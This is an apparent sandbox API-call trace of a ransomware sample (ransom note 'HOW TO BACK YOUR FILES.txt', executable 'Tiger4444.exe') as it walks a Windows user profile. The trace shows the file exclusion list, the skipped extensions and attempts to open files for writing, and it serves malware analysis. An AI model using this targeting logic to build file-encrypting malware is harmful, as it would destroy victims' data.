RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66548 | out: ListHead=0xc66828, ListEntry=0xc66548) returned 0xc66348 [0045.020] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0045.020] lstrcmpiW (lpString1="My Documents", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.020] lstrcmpiW (lpString1="My Documents", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.020] lstrcmpiW (lpString1="My Documents", lpString2="Tiger4444.exe") returned -1 [0045.020] lstrcmpiW (lpString1="My Documents", lpString2=".") returned 1 [0045.020] lstrcmpiW (lpString1="My Documents", lpString2="..") returned 1 [0045.020] lstrcmpiW (lpString1="My Documents", lpString2="windows") returned -1 [0045.020] lstrcmpiW (lpString1="My Documents", lpString2="bootmgr") returned 1 [0045.020] lstrcmpiW (lpString1="My Documents", lpString2="pagefile.sys") returned -1 [0045.020] lstrcmpiW (lpString1="My Documents", lpString2="boot") returned 1 [0045.020] lstrcmpiW (lpString1="My Documents", lpString2="ids.txt") returned 1 [0045.020] lstrcmpiW (lpString1="My Documents", lpString2="NTUSER.DAT") returned -1 [0045.020] lstrcpyW (in: lpString1=0x30aeac8, lpString2="My Documents" | out: lpString1="My Documents") returned="My Documents" [0045.021] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\My Documents", dwFileAttributes=0x2412) returned 1 [0045.021] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\My Documents\r\n") returned 47 [0045.021] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\My Documents\r\n") returned 47 [0045.021] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.021] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x601 [0045.021] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x2f, lpOverlapped=0x0) returned 1 [0045.022] CloseHandle (hObject=0x260) returned 1 [0045.023] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0045.023] lstrcmpiW (lpString1="NetHood", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.023] lstrcmpiW (lpString1="NetHood", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.023] lstrcmpiW (lpString1="NetHood", lpString2="Tiger4444.exe") returned -1 [0045.023] lstrcmpiW (lpString1="NetHood", lpString2=".") returned 1 [0045.023] lstrcmpiW (lpString1="NetHood", lpString2="..") returned 1 [0045.023] lstrcmpiW (lpString1="NetHood", lpString2="windows") returned -1 [0045.023] lstrcmpiW (lpString1="NetHood", lpString2="bootmgr") returned 1 [0045.023] lstrcmpiW (lpString1="NetHood", lpString2="pagefile.sys") returned -1 [0045.023] lstrcmpiW (lpString1="NetHood", lpString2="boot") returned 1 [0045.023] lstrcmpiW (lpString1="NetHood", lpString2="ids.txt") returned 1 [0045.023] lstrcmpiW (lpString1="NetHood", lpString2="NTUSER.DAT") returned -1 [0045.023] lstrcpyW (in: lpString1=0x30aeac8, lpString2="NetHood" | out: lpString1="NetHood") returned="NetHood" [0045.023] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NetHood", dwFileAttributes=0x2412) returned 1 [0045.024] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\NetHood\r\n") returned 42 [0045.024] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\NetHood\r\n") returned 42 [0045.024] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.024] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x630 [0045.024] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x2a, lpOverlapped=0x0) returned 1 [0045.025] CloseHandle (hObject=0x260) returned 1 [0045.027] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa9c141bf, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0xa9c141bf, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0045.027] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.027] lstrcmpiW (lpString1="NTUSER.DAT", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.027] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Tiger4444.exe") returned -1 [0045.027] lstrcmpiW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0045.027] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0045.027] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="windows") returned -1 [0045.027] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="bootmgr") returned 1 [0045.027] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="pagefile.sys") returned -1 [0045.027] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="boot") returned 1 [0045.027] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ids.txt") returned 1 [0045.027] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="NTUSER.DAT") returned 0 [0045.027] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x21204700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0045.027] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.027] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.027] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="Tiger4444.exe") returned -1 [0045.027] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2=".") returned 1 [0045.027] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="..") returned 1 [0045.027] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="windows") returned -1 [0045.027] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="bootmgr") returned 1 [0045.027] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="pagefile.sys") returned -1 [0045.027] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="boot") returned 1 [0045.027] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ids.txt") returned 1 [0045.028] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0045.028] lstrcpyW (in: lpString1=0x30aeac8, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0045.028] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\ntuser.dat.LOG1", dwFileAttributes=0x22) returned 1 [0045.028] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\ntuser.dat.LOG1", dwFileAttributes=0x6) returned 1 [0045.032] lstrlenW (lpString="ntuser.dat.LOG1") returned 15 [0045.032] lstrlenW (lpString="Tiger4444") returned 9 [0045.032] lstrcmpiW (lpString1=".dat.LOG1", lpString2="Tiger4444") returned -1 [0045.032] lstrlenW (lpString=".dll") returned 4 [0045.032] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0045.032] lstrlenW (lpString=".lnk") returned 4 [0045.032] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0045.032] lstrlenW (lpString=".ini") returned 4 [0045.032] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0045.032] lstrlenW (lpString=".sys") returned 4 [0045.032] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0045.032] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x21204700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0045.032] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.032] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.032] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="Tiger4444.exe") returned -1 [0045.032] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2=".") returned 1 [0045.032] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="..") returned 1 [0045.032] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="windows") returned -1 [0045.032] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="bootmgr") returned 1 [0045.032] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="pagefile.sys") returned -1 [0045.032] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="boot") returned 1 [0045.032] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ids.txt") returned 1 [0045.032] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0045.032] lstrcpyW (in: lpString1=0x30aeac8, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0045.032] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\ntuser.dat.LOG2", dwFileAttributes=0x22) returned 1 [0045.033] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\ntuser.dat.LOG2", dwFileAttributes=0x6) returned 1 [0045.033] lstrlenW (lpString="ntuser.dat.LOG2") returned 15 [0045.033] lstrlenW (lpString="Tiger4444") returned 9 [0045.033] lstrcmpiW (lpString1=".dat.LOG2", lpString2="Tiger4444") returned -1 [0045.033] lstrlenW (lpString=".dll") returned 4 [0045.033] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0045.033] lstrlenW (lpString=".lnk") returned 4 [0045.033] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0045.033] lstrlenW (lpString=".ini") returned 4 [0045.033] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0045.033] lstrlenW (lpString=".sys") returned 4 [0045.033] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0045.033] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0045.033] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.033] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.033] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="Tiger4444.exe") returned -1 [0045.033] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2=".") returned 1 [0045.033] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="..") returned 1 [0045.033] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="windows") returned -1 [0045.033] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="bootmgr") returned 1 [0045.033] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="pagefile.sys") returned -1 [0045.033] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="boot") returned 1 [0045.033] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="ids.txt") returned 1 [0045.033] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="NTUSER.DAT") returned 1 [0045.033] lstrcpyW (in: lpString1=0x30aeac8, lpString2="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf" | out: lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf") returned="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf" [0045.033] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", dwFileAttributes=0x22) returned 1 [0045.034] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", dwFileAttributes=0x6) returned 1 [0045.034] lstrlenW (lpString="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf") returned 55 [0045.034] lstrlenW (lpString="Tiger4444") returned 9 [0045.034] lstrcmpiW (lpString1="b}.TM.blf", lpString2="Tiger4444") returned -1 [0045.034] lstrlenW (lpString=".dll") returned 4 [0045.034] lstrcmpiW (lpString1=".blf", lpString2=".dll") returned -1 [0045.034] lstrlenW (lpString=".lnk") returned 4 [0045.034] lstrcmpiW (lpString1=".blf", lpString2=".lnk") returned -1 [0045.034] lstrlenW (lpString=".ini") returned 4 [0045.034] lstrcmpiW (lpString1=".blf", lpString2=".ini") returned -1 [0045.034] lstrlenW (lpString=".sys") returned 4 [0045.034] lstrcmpiW (lpString1=".blf", lpString2=".sys") returned -1 [0045.034] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0045.034] GetLastError () returned 0x20 [0045.034] wsprintfA (in: param_1=0x30ad238, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf _CreateFile error 32\r\n") returned 102 [0045.035] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf _CreateFile error 32\r\n") returned 102 [0045.035] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.035] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0045.035] WriteFile (in: hFile=0x260, lpBuffer=0x30ad238*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x30abefc, lpOverlapped=0x0 | out: lpBuffer=0x30ad238*, lpNumberOfBytesWritten=0x30abefc*=0x66, lpOverlapped=0x0) returned 1 [0045.037] CloseHandle (hObject=0x260) returned 1 [0045.038] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.038] CloseHandle (hObject=0x0) returned 0 [0045.038] CloseHandle (hObject=0xffffffff) returned 1 [0045.038] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2122a949, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2122a949, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0045.038] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.038] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.038] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="Tiger4444.exe") returned -1 [0045.038] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0045.038] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0045.038] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="windows") returned -1 [0045.039] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="bootmgr") returned 1 [0045.039] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="pagefile.sys") returned -1 [0045.039] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="boot") returned 1 [0045.039] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="ids.txt") returned 1 [0045.039] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="NTUSER.DAT") returned 1 [0045.039] lstrcpyW (in: lpString1=0x30aeac8, lpString2="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms" [0045.039] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x22) returned 1 [0045.039] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x6) returned 1 [0045.039] lstrlenW (lpString="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0045.039] lstrlenW (lpString="Tiger4444") returned 9 [0045.039] lstrcmpiW (lpString1="gtrans-ms", lpString2="Tiger4444") returned -1 [0045.039] lstrlenW (lpString=".dll") returned 4 [0045.039] lstrcmpiW (lpString1="s-ms", lpString2=".dll") returned 1 [0045.039] lstrlenW (lpString=".lnk") returned 4 [0045.039] lstrcmpiW (lpString1="s-ms", lpString2=".lnk") returned 1 [0045.039] lstrlenW (lpString=".ini") returned 4 [0045.039] lstrcmpiW (lpString1="s-ms", lpString2=".ini") returned 1 [0045.039] lstrlenW (lpString=".sys") returned 4 [0045.039] lstrcmpiW (lpString1="s-ms", lpString2=".sys") returned 1 [0045.040] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0045.040] GetLastError () returned 0x20 [0045.040] wsprintfA (in: param_1=0x30ad238, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms _CreateFile error 32\r\n") returned 139 [0045.040] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms _CreateFile error 32\r\n") returned 139 [0045.040] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.040] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6c0 [0045.040] WriteFile (in: hFile=0x260, lpBuffer=0x30ad238*, nNumberOfBytesToWrite=0x8b, lpNumberOfBytesWritten=0x30abefc, lpOverlapped=0x0 | out: lpBuffer=0x30ad238*, lpNumberOfBytesWritten=0x30abefc*=0x8b, lpOverlapped=0x0) returned 1 [0045.041] CloseHandle (hObject=0x260) returned 1 [0045.042] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.043] CloseHandle (hObject=0x0) returned 0 [0045.043] CloseHandle (hObject=0xffffffff) returned 1 [0045.043] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2122a949, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2122a949, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0045.043] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.043] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.043] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="Tiger4444.exe") returned -1 [0045.043] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0045.043] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0045.043] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="windows") returned -1 [0045.043] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="bootmgr") returned 1 [0045.043] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="pagefile.sys") returned -1 [0045.043] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="boot") returned 1 [0045.043] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="ids.txt") returned 1 [0045.043] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="NTUSER.DAT") returned 1 [0045.043] lstrcpyW (in: lpString1=0x30aeac8, lpString2="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms" 